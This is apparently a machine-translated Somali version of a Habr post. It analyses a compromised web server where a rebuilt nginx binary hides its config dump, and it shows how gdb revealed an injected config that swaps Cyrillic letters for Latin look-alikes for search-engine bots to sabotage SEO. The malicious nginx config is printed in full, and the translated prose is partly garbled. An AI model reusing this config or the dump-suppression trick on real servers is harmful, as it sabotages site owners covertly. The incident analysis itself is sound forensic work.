Sheeko aan fiicneyn ayaa ku dhacday mid ka mid ah asxaabta. Laakin sidii aan ugu fiicneyn sidii ay u noqotay Mikhail, waxay ii ahayd madadaalo aniga oo kale.
Waa in aan sheego in saaxiibkay aad u fiican yahay UNIX-user: wuxuu rakibi karaa nidaamka laftiisa MySQL, php oo samee dejinta fudud nginx.
Oo wuxuu leeyahay daraasiin ama hal iyo badh shabakadood oo u heellan qalabka dhismaha.
Mid ka mid ah goobahan loo qoondeeyay silsiladaha silsiladaha ayaa si adag ugu fadhiya TOP ee makiinadaha raadinta. Mareegtan waa dib-u-eege aan ganacsi ahayn, laakiin qof baa caado u noqday inuu weeraro. Taasi DDoS, ka dibna xoog ba'an, ka dibna waxay qoraan faallooyin fool xun waxayna u diraan xadgudubyada martigelinta iyo RKN.
Isla markiiba, wax walba way degeen oo xasilloonidani waxay noqotay mid aan wanaagsanayn, goobtuna waxay bilowday inay si tartiib tartiib ah uga baxdo safafka ugu sarreeya ee natiijooyinka raadinta.
Taasi waxay ahayd odhaah, ka dibna sheekada admin lafteeda.
Waxay ku dhowaatay wakhtiga jiifka markii taleefoonku soo dhacay: "San, miyaadan fiirin server-kayga? Waxay iila muuqataa in la i jabsaday, ma caddayn karo, laakiin dareenku igama tegin todobaadkii saddexaad. Waxaa laga yaabaa in ay tahay waqtigii aan heli lahaa daawaynta paranoia?
Waxa xigtay dood socotay nus saac oo lagu soo koobi karo sidatan.
- ciidda jabsiga waxay ahayd mid bacrin ah;
- weeraryahanku wuxuu heli karaa xuquuqaha kormeeraha;
- weerarka (haddii uu dhacay) waxaa si gaar ah loogu beegsaday goobtan;
- meelaha dhibaatadu ka jirto waa la saxay oo waxaad u baahan tahay oo kaliya inaad fahanto in ay jiraan wax la geliyey;
- jabsiga ma saamayn karo koodka goobta iyo xogta macluumaadka.
Marka la eego qodobka u dambeeya.
Kaliya IP-ga hore ee hore ayaa u muuqda adduunka. Ma jiro wax is dhaafsi ah oo u dhexeeya dhabarka dambe iyo kan hore marka laga reebo http (-yada), isticmaalayaasha / ereyada sirta ah way ka duwan yihiin, furayaal lama is dhaafsanin. Cinwaannada cawl, dhammaan dekedaha marka laga reebo 80/443 way xidhan yihiin. IP-yada dhabarka cad waxaa loo yaqaan kaliya laba isticmaale, kuwaas oo Mikhail uu si buuxda u aaminay.
Lagu rakibay dhinaca hore Debian 9 iyo marka la wacayo, nidaamka waa ka go'doomay dunida by firewall dibadda ah oo istaagay.
"Hagaag, i sii marin," waxaan go'aansaday inaan hurdadii iska dhigo saacad. "Waxaan ku arki doonaa indhahayga."
Halkan ka sii wad:
$ grep -F PRETTY_NAME /etc/*releas*
PRETTY_NAME="Debian GNU/Linux 9 (stretch)"
$ `echo $SHELL` --version
GNU bash, version 4.4.12(1)-release (x86_64-pc-linux-gnu)
$ nginx -v
nginx version: nginx/1.10.3
$ gdb --version
GNU gdb (Debian 8.2.1-2) 8.2.1
Raadinta hack suurtagal ah
Waxaan bilaabay server-ka, marka hore gudaha hab samatabbixin. Waxaan ku dhejiyaa saxanadaha oo aan ka rogo iyaga run-loox, taariikhda, Nidaamyada nidaamka, iwm., haddii ay suurtagal tahay, waxaan fiiriyaa taariikhaha abuurista faylka, inkastoo aan fahamsanahay in buskudka caadiga ah uu "ku xaaqan lahaa" naftiisa ka dib, Misha ayaa mar hore "ku tuntay" wax badan markii uu naftiisa raadinayay. .
Waxaan ku bilaabaa qaabka caadiga ah, weli ma fahmin waxa la raadinayo, waxaan baranayaa qaabeynta. Marka hore waan xiiseeyaa nginx maadaama, guud ahaan, ma jiraan wax kale oo ku yaala hore marka laga reebo.
Habayntu waa yar yihiin, si fiican ayaa loo habeeyey oo loo galiyay darsin faylal, kaliya ayaan ka dhex eegayaa bisad'oh mid mid. Wax walba waxay u muuqdaan inay nadiif yihiin, laakiin marnaba ma ogaan kartid haddii aan wax seegay waxaa ka mid ah, aan sameeyo liis dhamaystiran:
$ nginx -T
nginx: the configuration file /usr/local/etc/nginx/nginx.conf syntax is ok
nginx: configuration file /usr/local/etc/nginx/nginx.conf test is successful
Maan fahmin: "Aaway liiska?"
$ nginx -V
nginx version: nginx/1.10.3
TLS SNI support enabled
configure arguments: --with-cc-opt='-g -O2' --with-ld-opt='-Wl,-z,relro -Wl,-z,now' --prefix=/usr/share/nginx --conf-path=/etc/nginx/nginx.conf --http-log-path=/var/log/nginx/access.log --error-log-path=/var/log/nginx/error.log --lock-path=/var/lock/nginx.lock --pid-path=/run/nginx.pid --modules-path=/usr/lib/nginx/modules --http-client-body-temp-path=/var/lib/nginx/body --http-fastcgi-temp-path=/var/lib/nginx/fastcgi --http-proxy-temp-path=/var/lib/nginx/proxy --http-scgi-temp-path=/var/lib/nginx/scgi --http-uwsgi-temp-path=/var/lib/nginx/uwsgi --with-debug --with-pcre-jit --with-ipv6 --with-http_ssl_module --with-http_stub_status_module --with-http_realip_module --with-http_auth_request_module --with-http_v2_module --with-http_dav_module --with-http_slice_module --with-threads --with-http_addition_module --with-http_gunzip_module --with-http_gzip_static_module --with-http_sub_module --with-stream=dynamic --with-stream_ssl_module --with-mail=dynamic --with-mail_ssl_module
Su'aal labaad ayaa lagu daraa su'aasha liiska: "Waa maxay sababta nooca qadiimiga ah ee nginx?"
Intaa waxaa dheer, nidaamku wuxuu aaminsan yahay in version ugu dambeeyay la rakibay:
$ dpkg -l nginx | grep "[n]ginx"
ii nginx 1.14.2-2+deb10u1 all small, powerful, scalable web/proxy server
waan wacayaa:
- Misha, maxaad dib isugu soo ururisay nginx?
- Sug, xitaa ma aqaan sida tan loo sameeyo!
- Hagaag, si fiican, seexo...
Nginx si cad ayaa loo dhisay oo wax soo saarka liiska isticmaalaya "-T" waa la qariyey sabab. Ma jiraan wax shaki ah oo ku saabsan jabsiga oo waxaad si fudud u aqbali kartaa (maaddaama Misha ay ku beddeshay serverka mid cusub) ka fiirso dhibaatada la xalliyo.
Oo runtii, tan iyo markii qof helay xuquuqda xidid'ah, markaa waxa kaliya oo macquul ah in la sameeyo dib u rakib nidaamka, oo wax aan faa'iido lahayn in la raadiyo waxa meeshaas ka khaldan, laakiin markan xiisaha ayaa ka adkaaday hurdo. Sideen ku ogaan karnaa waxay rabeen inay naga qariyaan?
Aan isku dayno inaan raad raacno:
$ strace nginx -T
Waanu eegnaa, si cad uma jiraan khadadka ku filan raadadka a la
write(1, "/etc/nginx/nginx.conf", 21/etc/nginx/nginx.conf) = 21
write(1, "...
write(1, "n", 1
Kaliya madadaalo, aan is barbar dhigno natiijooyinka.
$ strace nginx -T 2>&1 | wc -l
264
$ strace nginx -t 2>&1 | wc -l
264
Waxaan qabaa qayb ka mid ah koodka /src/core/nginx.c
case 't':
ngx_test_config = 1;
break;
case 'T':
ngx_test_config = 1;
ngx_dump_config = 1;
break;
waxaa la keenay foomka:
case 't':
ngx_test_config = 1;
break;
case 'T':
ngx_test_config = 1;
//ngx_dump_config = 1;
break;
ama
case 't':
ngx_test_config = 1;
break;
case 'T':
ngx_test_config = 1;
ngx_dump_config = 0;
break;
sidaas darteed liiska "-T" lama soo bandhigin.
Laakin sideen u arki karnaa qaabkayaga?
Haddii fikirkaygu sax yahay, dhibaataduna ay tahay doorsoomiyaha oo keliya ngx_dump_config aan isku dayno inaan ku rakibno anaga oo adeegsanayna gdb, nasiib wanaag waxaa jira fure -- leh-cc-opt -g jooga oo rajayna in la wanaajiyo -O2 nama yeeli doonto. Isla mar ahaantaana, maadaama aanan garanayn sida ngx_dump_config waxaa lagu farsamayn karaa gudaha kiiska 'T':, kuma wici doono block this, laakiin ku rakib adigoo isticmaalaya kiiska 't':
Waa maxay sababta aad u isticmaali karto '-t' iyo sidoo kale '-T'Habaynta xannibaadda haddi(ngx_dump_config) gudaha ka dhaca haddi(ngx_test_config):
if (ngx_test_config) {
if (!ngx_quiet_mode) {
ngx_log_stderr(0, "configuration file %s test is successful",
cycle->conf_file.data);
}
if (ngx_dump_config) {
cd = cycle->config_dump.elts;
for (i = 0; i < cycle->config_dump.nelts; i++) {
ngx_write_stdout("# configuration file ");
(void) ngx_write_fd(ngx_stdout, cd[i].name.data,
cd[i].name.len);
ngx_write_stdout(":" NGX_LINEFEED);
b = cd[i].buffer;
(void) ngx_write_fd(ngx_stdout, b->pos, b->last - b->pos);
ngx_write_stdout(NGX_LINEFEED);
}
}
return 0;
}
Dabcan, haddii koodka la beddelo qaybtan oo aan la gelin kiiska 'T':, markaas habkaygu ma shaqayn doono.
Tijaabi nginx.confIyadoo horay loo xaliyay dhibaatada si tijaabo ah, waxaa la aasaasay in qaabeynta ugu yar loo baahan yahay si uu malware-ku u shaqeeyo nginx nooca:
events {
}
http {
include /etc/nginx/sites-enabled/*;
}
Waxaan u isticmaali doonaa si kooban maqaalka.
Bilow cilladaha
$ gdb --silent --args nginx -t
Reading symbols from nginx...done.
(gdb) break main
Breakpoint 1 at 0x1f390: file src/core/nginx.c, line 188.
(gdb) run
Starting program: nginx -t
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Breakpoint 1, main (argc=2, argv=0x7fffffffebc8) at src/core/nginx.c:188
188 src/core/nginx.c: No such file or directory.
(gdb) print ngx_dump_config=1
$1 = 1
(gdb) continue
Continuing.
nginx: the configuration file /etc/nginx/nginx.conf syntax is ok
nginx: configuration file /etc/nginx/nginx.conf test is successful
# configuration file /etc/nginx/nginx.conf:
events {
}
http {
map $http_user_agent $sign_user_agent
{
"~*yandex.com/bots" 1;
"~*www.google.com/bot.html" 1;
default 0;
}
map $uri $sign_uri
{
"~*/wp-" 1;
default 0;
}
map о:$sign_user_agent:$sign_uri $sign_o
{
о:1:0 o;
default о;
}
map а:$sign_user_agent:$sign_uri $sign_a
{
а:1:0 a;
default а;
}
sub_filter_once off;
sub_filter 'о' $sign_o;
sub_filter 'а' $sign_a;
include /etc/nginx/sites-enabled/*;
}
# configuration file /etc/nginx/sites-enabled/default:
[Inferior 1 (process 32581) exited normally]
(gdb) quit
Tallaabooyinka:
- go'aan ka dhig shaqada ugu weyn ()
- bilaabay barnaamijka
- beddelo qiimaha doorsoomayaasha go'aamiya wax soo saarka habaynta ngx_dump_config=1
- sii wad/dhamee barnaamijka
Sida aan arki karno, qaabka dhabta ah wuu ka duwan yahay kayga, waxaanu ka dooranaa qayb dulin ah:
map $http_user_agent $sign_user_agent
{
"~*yandex.com/bots" 1;
"~*www.google.com/bot.html" 1;
default 0;
}
map $uri $sign_uri
{
"~*/wp-" 1;
default 0;
}
map о:$sign_user_agent:$sign_uri $sign_o
{
о:1:0 o;
default о;
}
map а:$sign_user_agent:$sign_uri $sign_a
{
а:1:0 a;
default а;
}
sub_filter_once off;
sub_filter 'о' $sign_o;
sub_filter 'а' $sign_a;
Aynu si habsami leh u eegno waxa halkan ka dhacaya.
Go'aansaday Wakiilka Adeegsiga'yandex/google:
map $http_user_agent $sign_user_agent
{
"~*yandex.com/bots" 1;
"~*www.google.com/bot.html" 1;
default 0;
}
Bogagga adeegga waa laga saaray WordPress:
map $uri $sign_uri
{
"~*/wp-" 1;
default 0;
}
Iyo kuwa ku dhaca labada shuruudood ee kor ku xusan
map о:$sign_user_agent:$sign_uri $sign_o
{
о:1:0 o;
default о;
}
map а:$sign_user_agent:$sign_uri $sign_a
{
а:1:0 a;
default а;
}
ee qoraalka html-bogagga ayaa isbedela 'O' on 'o' и 'A' on 'a':
sub_filter_once off;
sub_filter 'о' $sign_o;
sub_filter 'а' $sign_a;
Taasi waa sax, khiyaanada kaliya ayaa ah taas 'a'! = 'a' sida 'o'! = 'o':
Markaa, bots search engine waxay helayaan, halkii ay ka ahaan lahaayeen 100% qoraalka Cyrillic caadiga ah, qashinka wax laga beddelay ee lagu qasi jiray Laatiinka. 'a' и 'o'. Kuma dhicin inaan ka hadlo sida tani u saameynayso SEO, laakiin uma badna in xarfaha noocan oo kale ah ay saameyn togan ku yeelan doonaan jagooyinka natiijooyinka raadinta.
Maxaan dhihi karaa, nimanyahow male.
tixraacyada
Source: www.habr.com